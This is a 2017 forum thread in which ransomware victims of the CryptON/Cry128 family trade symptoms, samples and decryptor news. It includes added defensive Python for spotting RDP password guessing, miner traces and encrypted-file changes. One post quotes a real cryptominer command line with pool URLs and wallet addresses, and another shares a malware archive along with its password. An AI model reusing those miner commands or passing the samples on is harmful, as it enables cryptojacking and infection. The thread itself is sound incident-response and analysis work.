Maxim, posted April 21, 2017:
Hi! It looks like I was attacked by a new version of CryptON ransomware (post-Cry9). All the encrypted files are 36 bytes longer than their original versions. A couple of examples are attached. I would appreciate it if you could help with the decryption. Thank you.
Attachments: SQLIO.zip, write_company_note.zip

McGaz, posted April 24, 2017:
I've also been hacked by (what I think is) this one and my files are 36 bytes longer too. Do you suspect that they got in via Remote Desktop?

pursang, posted April 24, 2017:
Make that a "me too", also for the RDP question. However, I'm still trying to figure out how they pulled that one off; AFAIK no passwords were compromised. If anyone wants some details of what I have, feel free to ask. Waiting patiently to see if there's a resolution. Fingers crossed.

Sarah W, posted April 24, 2017:
Hi all,
Yes, they are hacking in via insecure RDP configuration. Make sure, if you continue to use RDP, that you set a strong password. We are looking into it and hopefully will have something for you in terms of decryption, though it may take a while since the member who does the decryption is ill.
Regards,
Sarah
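Sarah's reply names the entry vector everyone in the thread is asking about: an RDP endpoint reachable from the Internet whose password was guessed. The trace that leaves in the Windows Security log is a burst of failed logons (event 4625 with logon type 10, RemoteInteractive) from one source address, followed by a successful logon (event 4624, logon type 10) from the same address. The detector below is an added example, not code from the original post or from Emsisoft. The one-event-per-line text format, the field names, the IP addresses, the user names and the threshold are all constructed for the demo; a real deployment would feed it events parsed from an EVTX or XML export.

```python
"""Spot RDP password guessing in constructed Windows Security log lines.

Added example. The one-event-per-line format below is an assumption for the
demo, not the real EVTX layout; adapt parse_event() to your own log export.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Any, Deque, Dict, List, Tuple

FAILED_LOGON = "4625"     # Windows: an account failed to log on
SUCCESS_LOGON = "4624"    # Windows: an account was successfully logged on
RDP_LOGON_TYPE = "10"     # RemoteInteractive, i.e. Remote Desktop
THRESHOLD = 5             # failures from one source inside WINDOW -> alert
WINDOW = timedelta(minutes=10)


def parse_event(line: str) -> Dict[str, Any]:
    """Parse 'TIMESTAMP key=value key=value ...' into a dict (constructed format)."""
    stamp, *fields = line.split()
    event: Dict[str, Any] = dict(field.split("=", 1) for field in fields)
    event["ts"] = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect_rdp_abuse(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return alerts as (kind, source_ip, detail).

    'bruteforce'            : THRESHOLD or more RDP failures from one IP in WINDOW
    'success_after_failures': that same IP later logs on over RDP successfully
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged = set()
    alerts: List[Tuple[str, str, str]] = []
    for event in (parse_event(line) for line in lines):
        if event.get("LogonType") != RDP_LOGON_TYPE:
            continue   # console, network and service logons are out of scope here
        ip = event.get("Ip", "?")
        if event.get("EventID") == FAILED_LOGON:
            window = recent[ip]
            window.append(event["ts"])
            while window and event["ts"] - window[0] > WINDOW:
                window.popleft()   # drop failures older than WINDOW
            if len(window) >= THRESHOLD and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip,
                               f"{len(window)} RDP failures within {WINDOW}"))
        elif event.get("EventID") == SUCCESS_LOGON and ip in flagged:
            alerts.append(("success_after_failures", ip,
                           f"RDP logon as {event.get('User')} after guessing"))
    return alerts


# Constructed sample: one guessing source, one legitimate user with a typo,
# and a non-RDP failure (logon type 3) that must be ignored.
SAMPLE_LOG = [
    "2017-04-20T03:10:01Z EventID=4625 LogonType=10 User=administrator Ip=203.0.113.7",
    "2017-04-20T03:10:03Z EventID=4625 LogonType=10 User=administrator Ip=203.0.113.7",
    "2017-04-20T03:10:05Z EventID=4625 LogonType=10 User=admin Ip=203.0.113.7",
    "2017-04-20T03:10:06Z EventID=4625 LogonType=3 User=svc_backup Ip=10.0.0.9",
    "2017-04-20T03:10:07Z EventID=4625 LogonType=10 User=admin Ip=203.0.113.7",
    "2017-04-20T03:10:09Z EventID=4625 LogonType=10 User=Administrator Ip=203.0.113.7",
    "2017-04-20T03:12:00Z EventID=4625 LogonType=10 User=maria Ip=198.51.100.4",
    "2017-04-20T03:12:20Z EventID=4624 LogonType=10 User=maria Ip=198.51.100.4",
    "2017-04-20T03:14:31Z EventID=4624 LogonType=10 User=Administrator Ip=203.0.113.7",
]

if __name__ == "__main__":
    for kind, ip, detail in detect_rdp_abuse(SAMPLE_LOG):
        print(f"{kind:24} {ip:15} {detail}")
```

The second alert is the one that matters for incident response: a success from a source that was just guessing is the moment of compromise, and the logon time bounds when the encryption and any follow-on tooling could have been dropped. The check only sees guessing; it says nothing about a leaked or reused password, so it is a complement to, not a substitute for, taking port 3389 off the Internet (VPN or RD Gateway), requiring Network Level Authentication and enforcing an account lockout policy.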
McGaz, posted April 25, 2017:
Thanks for the update, Sarah.

Abhijit, posted April 26, 2017:
Thanks, Sarah. Appreciated; I await a further update.

Battery Low, posted April 26, 2017:
Exact same problem here. I'd be thankful to you, Sarah, if you could provide any solution to this.

hmtech, posted April 26, 2017:
Same issue with us. We have a PC struck with a new version of CryptON. Files were changed to *[wqfhdgpdelcgww4g.onion.to].mf8y3, but the size seems to be the same between the original and the encrypted one. When we uploaded the ransom note and an encrypted file via ID Ransomware, we got two results: that it's either Cry128 (which is still under analysis) or Cry9 (but we tried the decryptor and got an error that it's not a valid CryptON file pair, etc.). It was probably via RDP here too.

schfrank, posted April 26, 2017:
Hi, I'm from Taiwan. SOS...
Attachments: _DECRYPT_MY_FILES.txt, 免服編號.txt.id_6014747_2irbar3mjvbap6gt.onion.to._

Edwin, posted April 26, 2017:
Same problem here! Looking for a solution... Shall I format my computer and wait for a Cry128 decryptor? Or leave it and wait for the decryptor? (I have made a copy of the infected files.)

monkeymatic, posted April 27, 2017:
On 26/04/2017 at 6:39 PM, Edwin said: "Same problem here! Looking for a solution... Shall I format my computer and wait for a Cry128 decryptor? Or leave it and wait for the decryptor? (I have made a copy of the infected files.)"
Can't really give advice beyond... I think it's always best to leave it and wait, just in case. Maybe image your hard drive if you want to format; then you can always re-image to get the original setup back.

Sarah W, posted April 27, 2017:
On 26/04/2017 at 6:39 PM, Edwin said: "Same problem here! Looking for a solution... Shall I format my computer and wait for a Cry128 decryptor? Or leave it and wait for the decryptor? (I have made a copy of the infected files.)"
Hi Edwin,
You can format your computer and then copy the encrypted files over to the new system. We are currently still working on the solution.
Regards,
Sarah
Battery Low, posted April 28, 2017:
10 hours ago, Sarah W said: "Hi Edwin, You can format your computer and then copy the encrypted files over to the new system. We are currently still working on the solution. Regards, Sarah"
Appreciate your efforts; waiting for some solution...

mikeody1989, posted April 28, 2017:
Hi, new member here! Same issue (36-byte difference between original and encrypted file). The RDP password was very strong, although we used the default port and it wasn't secure. When we kicked them out, they removed us from their database, so we don't even have the option of paying the ransom... Thankfully we have original files to match with the encrypted ones in case Emsisoft releases a decryptor. We really appreciate your efforts, guys! Sending positive energy!

juicefish, posted April 28, 2017:
I have the same problem on my PC. Here are some of my infected files. It sounds like RDP is the problem that let it access my PC, but I had closed all Windows 7 native RDP before it happened. Could there be some problem that can be done through Chrome Remote Desktop? (I noticed that I received a Google account login SMS, but I didn't log in or input the code.) Or do I just have the wrong idea about RDP hacking?
Attachment: Cry128_Sample.zip

djunges, posted April 30, 2017:
Hi, we are from Brazil and our server has the same issue. Can anyone help us, please?
Regards and thanks in advance,
djunges

izuran, posted May 2, 2017:
Hi, I have the same issue; here is a sample with a file before and after. It seems to be triggered from a file called QQSS77889900.EXE, which created other EXEs like L.EXE, A.EXE, A[1].exe, A[2].exe, G.exe, a[3].exe.
Attachments: _DECRYPT_MY_FILES.txt, Summary.xml, Summary.xml.id_1756635677_2irbar3mjvbap6gt.onion.to._
I would also add: do not try to pay for these to be decrypted, as it does not work.

XeuZ, posted May 2, 2017:
Hi, I have the same problem! I have a backup, but I can't recover some files from the backup. Do you have any news about the decryptor?
Attachments: 28-02.xls, 28-02.xls.id_2905610453_2irbar3mjvbap6gt.onion.to._, qqss77889900.exe, _DECRYPT_MY_FILES.txt, 15321.exe

Demonslay335, posted May 2, 2017:
Fabian Wosar has released a decrypter for Cry128, the newest variant of this Nemesis/CryptON garbage. http://blog.emsisoft.com/2017/05/01/remove-cry128-ransomware-with-emsisofts-free-decrypter/
mclaugb, posted May 2, 2017:
My files have the same gebdp3k7bolalnd4.onion._ extensions. Mine was a Windows machine with Remote Desktop connections disabled but Remote Assistance enabled. I consider myself very computer savvy, but so far I've found no applications or processes running in the background. Malwarebytes and McAfee both cannot detect this strain. Files do not appear to be any specific number of KB larger than the originals (it seems to vary depending on the file). The Cry128 decrypter attempted two sets of files without success. I've attached a few files here; I can come up with more of them.
Attachments: Bobbin REV 6 Specification print.pdf, Bobbin REV 6 Specification print.pdf.id_1638578921_gebdp3k7bolalnd4.onion._, TDS-DC25-UB25-RW-MAC-07-2014.pdf, TDS-DC25-UB25-RW-MAC-07-2014.pdf.id_1638578921_gebdp3k7bolalnd4.onion._

pursang, posted May 2, 2017:
I didn't have any luck with the new tool, although my files appear to be strong candidates. So now I'm wondering about the tool. Does it have a better chance of success if it has more memory available? Larger files? What? Clearly Fabian has had successful hits in finding keys, but there seem to be hidden depths to this one. What more can we (the community) do to help?

mikeody1989, posted May 2, 2017:
Unfortunately no luck for us either :/ This link: http://blog.emsisoft.com/2017/05/01/remove-cry128-ransomware-with-emsisofts-free-decrypter/ mentions 16 bytes, whereas in our case (and for most of the people in this thread, from what I understand) it is 36 bytes. The decryptor accepts the files anyway... but with no luck in brute-forcing the key (we tried several files). Does that mean we are out of luck? I am attaching files here in case someone can... save my life.
Attachments: EntityFramework.xml.id_3575451207_2irbar3mjvbap6gt.onion.to._, EntityFramework.xml

TheMask, posted May 2, 2017:
Yes, we need a 32-byte decryptor (not 16 bytes). Original file 500 bytes, encrypted file 532 bytes. I think we are out of luck.

mclaugb, posted May 2, 2017:
We're finding that many of the encrypted files are the exact same file size as the unencrypted originals. See the attached files.
Attachments: 3X8Sheep_Base_SingleBlock.dxf, 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._

TheMask, posted May 2, 2017:
My files all have the same size; encrypted files are 32 bytes more than the original files. Maybe Emsisoft will release a new decrypter; maybe we are lucky.
Shlomi, posted May 3, 2017:
Hi, thank you for the quick release for the Cry128 ransomware. Unfortunately, I tried it and after 80% of brute-forcing the files it said that it failed to generate the key. I'm 99% sure I was attacked by Cry128 (checked online by submitting the files: 36 bytes, same ransom note, same extension, etc.). Can you suggest what else I can do? Maybe I have a newer version? (I submitted the files to you.) Thanks!

Geng, posted May 3, 2017:
Correcting a couple of the above users who said they have a 32-byte difference: it's 36 bytes; at least, that's what 99% of us here are dealing with.

Borro97, posted May 3, 2017:
Me too: many (almost all) files are 36 bytes bigger; some zip files are only renamed. The Cry128 decrypter did not work. After 100% I got this message at the end:
"The decryption key for your system could not be found. Please attempt to drag and drop both an encrypted and its original file on the decrypter executable. If that didn't work there is unfortunately no way this decrypter will be able to decrypt your files. We instead suggest to restore your files from your latest backup."
Thanks

DrAries77, posted May 3, 2017:
Dear all, on 28th April almost all files on my PC were encrypted by the ransomware gebdp3k7bolalnd4.onion._ We need to pay ("You need to pay: 0.14451 BTC (~200$)") to receive the decrypter (HOPE)... Have you found any solution for this bastard ransomware? Regards.

mclaugb, posted May 3, 2017:
Okay, here are some more data points for you anti-virus-making people. McAfee, your tools are not detecting this one. These are logs from the Windows Application log:
Started svchost.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8888 -u 48aNFV3juaCLLQF8zPtdwdgvxt3YX1HmC3nvCu9psPuBDcoEBJGps3YFKU2diFBLby7WoQUqAo3ZP1Z3ay9yt2fDVAaWBuj -p x for service Mysqlvers in C:\windows.
Started C:\Windows\dell\run64.bat for service Windows32_Update in C:\Windows\dell.
The bat file says:
Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1
In C:\windows\dell there are 'run.bat', 'run64.bat' and 'svchost.exe'.
Other Windows Application log entries show:
C:\Windows\systxm\winlogon.exe NT AUTHORITY\SYSTEM ran C:\Windows\svchoot.exe, which attempted to access C:\Windows\systxm\svchost.exe.
The potentially unwanted program named CoinMiner was detected and deleted.
Mysqlvers 1500 2000
Mysqlvers 0
Restart svchost.exe
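The log excerpt mclaugb posted carries three kinds of evidence that a scanner can pick out mechanically even when the binaries themselves are not signatured: mining-pool command lines (stratum+tcp:// URLs, the cryptonight algorithm switch), Windows system binary names running from directories other than System32 (C:\Windows\dell\svchost.exe, C:\Windows\systxm\winlogon.exe) and typo-squatted names such as svchoot.exe. The scanner below is an added example, not code from the post or from any vendor product. The sample lines are constructed to mirror the shape of the excerpt (wallet addresses replaced by placeholders), and the directory whitelist, the binary name list and the similarity threshold are assumptions for the demo.

```python
"""Flag coin-miner and masquerading-binary traces in application log lines.

Added example. The sample lines are constructed after the excerpt in the
thread; the name list, directory whitelist and threshold are assumptions.
"""
import re
from difflib import SequenceMatcher
from typing import Dict, List

# Windows binaries that should only ever run from these directories.
SYSTEM_BINARIES = {"svchost.exe", "winlogon.exe", "lsass.exe", "csrss.exe", "services.exe"}
LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
LOOKALIKE_RATIO = 0.85   # similarity above which a name is treated as a typo-squat

MINER_MARKERS = [
    ("mining pool URL", re.compile(r"stratum\+tcp://", re.I)),
    ("cryptonight algorithm switch", re.compile(r"\bcryptonight\b", re.I)),
    ("Monero ticker in host name", re.compile(r"\bxmr\b", re.I)),
]
EXE_RE = re.compile(r"([A-Za-z]:\\[^\s\"',]+?\.exe)", re.I)
SERVICE_RE = re.compile(r"for service (\S+) in ([A-Za-z]:\\[^\s.]*)", re.I)


def _path_findings(path: str) -> List[str]:
    """Judge one executable path: wrong directory, or name close to a system binary."""
    lowered = path.lower()
    directory, _, name = lowered.rpartition("\\")
    directory += "\\"
    out: List[str] = []
    if name in SYSTEM_BINARIES:
        if not directory.startswith(LEGIT_DIRS):
            out.append(f"{name} running outside System32: {path}")
    else:
        best = max(SYSTEM_BINARIES,
                   key=lambda s: SequenceMatcher(None, name, s).ratio())
        if SequenceMatcher(None, name, best).ratio() >= LOOKALIKE_RATIO:
            out.append(f"{name} looks like a typo-squat of {best}: {path}")
    return out


def scan_line(line: str) -> List[str]:
    """Return every finding for one log line (empty list means nothing suspicious)."""
    findings: List[str] = []
    for label, marker in MINER_MARKERS:
        if marker.search(line):
            findings.append(f"miner marker: {label}")
    for path in EXE_RE.findall(line):
        findings.extend(_path_findings(path))
    for service, directory in SERVICE_RE.findall(line):
        normalised = directory.lower().rstrip("\\") + "\\"
        if not normalised.startswith(LEGIT_DIRS):
            findings.append(f"service {service} runs from unusual directory {directory}")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> findings, keeping only lines that raised something."""
    report: Dict[int, List[str]] = {}
    for index, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            report[index] = hits
    return report


# Constructed lines mirroring the excerpt above; WALLET_A is a placeholder.
SAMPLE_LOG = [
    "Started svchost.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8888 "
    "-u WALLET_A -p x for service Mysqlvers in C:\\windows.",
    "Started C:\\Windows\\dell\\run64.bat for service Windows32_Update in C:\\Windows\\dell.",
    "C:\\Windows\\systxm\\winlogon.exe NT AUTHORITY\\SYSTEM ran C:\\Windows\\svchoot.exe, "
    "which attempted to access C:\\Windows\\systxm\\svchost.exe.",
    "C:\\Windows\\System32\\svchost.exe -k netsvcs started for service Dhcp "
    "in C:\\Windows\\System32.",   # legitimate line; must stay clean
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG).items():
        print(f"line {index}:")
        for hit in hits:
            print("   ", hit)
```

The miner itself is a separate payload from the file encryptor, so a clean result from this scan says nothing about whether the encryptor or the attacker's RDP session is gone; it is a triage aid for the "no processes in the background" situation mclaugb describes, not a removal tool.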
mclaugb, posted May 3, 2017:
I can post the .exe files from this folder if anyone wants them. I submitted them to Emsisoft's website, but I don't want to infect others.

mclaugb, posted May 3, 2017:
I am posting the infected files here, attached as "dell_Infected.zip". The zip file requires the password "infected" to open it. Please use with caution, as they are .exe files infected with the CRY128 virus.
Attachment: dell_Infected.zip

GeorgeB, posted May 6, 2017:
On 5/3/2017 at 4:13 PM, mclaugb said: "I am posting the infected files here, attached as "dell_Infected.zip". The zip file requires the password "infected" to open it. Please use with caution, as they are .exe files infected with the CRY128 virus."
Please send the infected exe archive to me. I want to let it encrypt some files in a VM.

izuran, posted May 7, 2017:
Just for reference, this thing seems to only alter the first 10 KB of information and the end 36 bytes, which it adds on. The last 4 bytes are always the same on that computer. So if you have a large database or a file type with recovery tools, you can likely try to rebuild it.

mclaugb, posted May 8, 2017:
I ran R-Soft deleted-file recovery in case the ransomware had deleted the old files and left the file system table. It came up with some deleted files, but most are not readable; some were, but all the old filenames are gone. I did find some easy files to compare using a DIFF function in a hex editor. These files are mostly ASCII text files (they were AutoCAD files), so they make it very easy to see what the ransomware did. If any of you know how to decrypt codes, these should be two easy files to look at.
Attachments: 3X8Sheep_Base_SingleBlock.dxf, 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
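izuran's observation (only the first 10 KB changed, 36 bytes appended, the last 4 of them constant on one machine) and mclaugb's hex-editor diff of original/encrypted pairs are the same measurement done by hand. The script below automates it over any number of pairs: it reports the size delta, the first and last offset that differ, whether a file was merely renamed (the untouched zips several posters mention), extracts the appended trailer, finds the suffix all trailers share, and carves out the untouched bytes past the modified head that a format-aware repair tool could work from. It is an added example, not code from the thread or from Emsisoft. The "encryption" inside it is a constructed XOR stand-in that only reproduces the reported shape; it is not the Cry128 cipher, and the 10 KB extent, the 36-byte trailer, the machine tag and all sample data are constructed.

```python
"""Map what the ransomware changed, given original/encrypted file pairs.

Added example (not from the thread or from Emsisoft). fake_encrypt() is a
stand-in that only reproduces the shape reported in the posts (first 10 KB
changed, 36 bytes appended, last 4 trailer bytes constant per machine); it
is NOT the real Cry128 cipher, and all offsets, tags and data are constructed.
"""
from typing import Dict, List, Optional, Tuple

HEAD_LEN = 10 * 1024   # assumed extent of the modified region (per the thread)
TRAILER_LEN = 36       # bytes appended, as reported in the thread


def analyze_pair(original: bytes, encrypted: bytes) -> Dict[str, object]:
    """Size delta, modified span inside the original's length, and appended trailer."""
    delta = len(encrypted) - len(original)
    body = encrypted[:len(original)]
    trailer = encrypted[len(original):] if delta > 0 else b""
    first: Optional[int] = None
    last: Optional[int] = None
    for offset, (a, b) in enumerate(zip(original, body)):
        if a != b:
            if first is None:
                first = offset
            last = offset
    return {
        "size_delta": delta,
        "renamed_only": delta == 0 and first is None,   # e.g. the untouched zips
        "first_diff": first,
        "last_diff": last,
        "trailer": trailer,
    }


def common_suffix(blobs: List[bytes]) -> bytes:
    """Longest suffix shared by every blob (finds the per-machine constant bytes)."""
    if not blobs:
        return b""
    n = 0
    shortest = min(len(b) for b in blobs)
    while n < shortest and len({b[-1 - n] for b in blobs}) == 1:
        n += 1
    return blobs[0][len(blobs[0]) - n:] if n else b""


def salvage_tail(encrypted: bytes, head_len: int = HEAD_LEN,
                 trailer_len: int = TRAILER_LEN) -> bytes:
    """Bytes after the modified head and before the trailer: untouched original
    data that a format-aware repair tool may be able to rebuild from."""
    end = len(encrypted) - trailer_len
    return encrypted[head_len:end] if end > head_len else b""


def fake_encrypt(data: bytes, key: bytes, nonce: bytes, machine_tag: bytes) -> bytes:
    """Constructed stand-in for the ransomware (XOR, not the real cipher):
    scramble the first HEAD_LEN bytes, keep the rest, append nonce + machine_tag."""
    assert len(nonce) + len(machine_tag) == TRAILER_LEN
    head = bytes(b ^ key[i % len(key)] for i, b in enumerate(data[:HEAD_LEN]))
    return head + data[HEAD_LEN:] + nonce + machine_tag


def demo() -> Dict[str, object]:
    """Run the analysis over constructed pairs and summarise the results."""
    key = b"\x5a\xa5\x3c\xc3"          # no zero bytes, so every head byte changes
    tag = b"\xde\xad\xbe\xef"          # constructed per-machine constant
    doc_a = bytes(range(256)) * 80     # 20480-byte constructed "document"
    doc_b = doc_a[::-1]
    zip_blob = b"PK\x03\x04" + b"\x00" * 60   # zip: only renamed, per the thread
    pairs: List[Tuple[bytes, bytes]] = [
        (doc_a, fake_encrypt(doc_a, key, b"\x01" * 32, tag)),
        (doc_b, fake_encrypt(doc_b, key, b"\x02" * 32, tag)),
        (zip_blob, zip_blob),
    ]
    results = [analyze_pair(o, e) for o, e in pairs]
    trailers = [r["trailer"] for r in results if r["trailer"]]
    return {
        "results": results,
        "machine_constant": common_suffix(trailers),
        "salvageable_bytes": len(salvage_tail(pairs[0][1])),
    }


if __name__ == "__main__":
    summary = demo()
    for r in summary["results"]:
        print(r["size_delta"], r["renamed_only"], r["first_diff"], r["last_diff"])
    print(summary["machine_constant"].hex(), summary["salvageable_bytes"])
```

To use it on real pairs, read each original and its .id_..._ counterpart with open(path, "rb").read() and pass them to analyze_pair(); first_diff and last_diff tell you whether the 10 KB figure holds for your files, and common_suffix() over all trailers recovers the per-machine constant. Note what this does and does not give you: for a large database or media file, salvage_tail() returns the bulk of the data untouched, which is what izuran means by rebuilding with format-specific recovery tools, but the first 10 KB (headers, allocation tables) are still gone, and nothing here recovers the key.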
Sarah W, posted May 9, 2017:
Hi all,
We are currently still looking into whether the ransomware is decryptable or not. We will let you know if we find out whether it is. There may be a cryptocoin miner on the system (a program which uses your CPU to mine a cryptocurrency for the criminal, in this case), so if you want to check whether the system is clean then you can use our product, Emsisoft Anti-Malware. If you like our product and it is of help then please consider buying it; the price is discounted and we protect against ransomware such as this one. Some other advice is that investing in a good backup procedure is very important and well worth it. I would suggest having two or more backups, at least one disconnected.
Regards,
Sarah

lemmer89, posted May 28, 2017:
Hello dear Sarah and other contributors,
My computer has also been infected (it happened at the end of April). A few gigabytes of precious data that was never backed up are waiting for a decryption solution. Nothing new here: the same kind of files with 36 bytes added to the file size, with the suffix ".id_2281068xxx_gebdp3k7bolalnd4.onion._" added to file names. Some zip files were renamed but left untouched by the ransomware (I presume it was Cry128). Now all of my company's computers have Emsisoft Anti-Malware installed, since this attack could have destroyed several years of labour, or at least several days, since most of us use backup devices from time to time. Regarding the non-backed-up data: we are crying for your precious help. If required, I can upload some infected files alongside the original file. As a footnote: regarding infected text files, it seems that only part of the file (say the first kilobytes) is encrypted. Just want to say: good luck :-)

lemmer89, posted June 13, 2017:
Hello again. Looks like Cry128 really was a difficult one. Could anyone from Emsisoft post an updated status here? Great thanks and kind regards.

MrDat, posted June 25, 2017:
Dear all, this is what is on my PC today:
### DECRYPT MY FILES ###.TXT
*** ALL YOUR WORK AND PERSONAL FILES HAVE BEEN ENCRYPTED ***
To decrypt your files you need to buy the special software – «Nemesis decryptor»
You can find out the details / buy decryptor + key / ask questions by email: [email protected]
Your personal ID: 2840776094
All filenames are: <OriginalFilename>.id-2840776094_[[email protected]].5d4s9
The encrypted files are 36 characters larger than the original size; they are in the attachments. I think it's CRY36, but I tried Avast, Kaspersky, Emsisoft... NOT WORKING! Please help me, thanks!
Attachments: allInOne.js, allInOne.js.id-2840776093_[[email protected]].5d4s9, favicon.ico, favicon.ico.id-2840776093_[[email protected]].5d4s9, ### DECRYPT MY FILES ###.txt

mrhadavand, posted July 15, 2017:
On 6/25/2017 at 11:50 PM, MrDat said: "Dear all, this is what is on my PC today: ### DECRYPT MY FILES ###.TXT *** ALL YOUR WORK AND PERSONAL FILES HAVE BEEN ENCRYPTED *** To decrypt your files you need to buy the special software – «Nemesis decryptor» You can find out the details / buy decryptor + key / ask questions by email: [email protected] Your personal ID: 2840776094 All filenames are: <OriginalFilename>.id-2840776094_[[email protected]].5d4s9 The encrypted files are 36 characters larger than the original size; they are in the attachments. I think it's CRY36, but I tried Avast, Kaspersky, Emsisoft... NOT WORKING! Please help me, thanks!"
Please help me!!!
Attachment: __Sys__.ldf.id_3946907184_[[email protected]].5d4s9